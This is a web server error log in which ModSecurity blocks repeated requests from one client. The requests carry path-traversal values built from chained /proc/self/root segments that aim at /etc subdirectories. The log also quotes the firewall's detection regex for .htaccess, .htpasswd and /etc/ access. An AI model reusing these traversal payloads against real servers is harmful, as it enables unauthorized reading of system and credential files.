[Fri Mar 20 08:44:11.622916 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:59860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zC9a6ubjKNq_cu4bdjQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:14.342515 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:59870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zDRCii7xarUs8iHZvUwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:18.477556 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:59872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zETJ3M9BSuKP7CAYmYgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:20.227458 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:59882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zFPXLqtnMIWvjpaKinQAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:21.559177 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:59894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zFfHIg5MgXLBnicP_XAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:23.101272 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:59904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zF_qxLDW4GITHUkTw-AAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:24.942697 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:59906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zGBCii7xarUs8iHZvWwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:27.051419 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:59908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zGzJ3M9BSuKP7CAYmZwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:28.702705 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:59914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zHPqxLDW4GITHUkTw_wAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:30.554987 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:56614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zHta6ubjKNq_cu4bdnwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:32.014748 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:56628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zIPqxLDW4GITHUkTxBAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:32.615791 2026] [mime_magic:error] [pid 9818:tid 140411683178240] (70014)End of file found: [client 57.141.18.27:48130] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:44:33.387039 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:56638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zIfqxLDW4GITHUkTxCQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:34.827064 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:56646] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zIrninkcc-iUj5AplpAAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:36.159073 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:56662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zJPqxLDW4GITHUkTxDgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:37.559065 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:56666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zJeoXxyEfFpUF8f-JKgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:38.850140 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:56682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zJhCii7xarUs8iHZvawAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:40.091535 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:57682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zKPXLqtnMIWvjpaKixgAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:41.399438 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:57696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zKQF0L0L-SsrnPo5xFwAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:42.918741 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:57706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zKrninkcc-iUj5AplrwAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:45.262535 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:57710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zLfHIg5MgXLBnicP_cgAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:56.358424 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.244.43:37340] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0zOPqxLDW4GITHUkTxIwAAARc"]
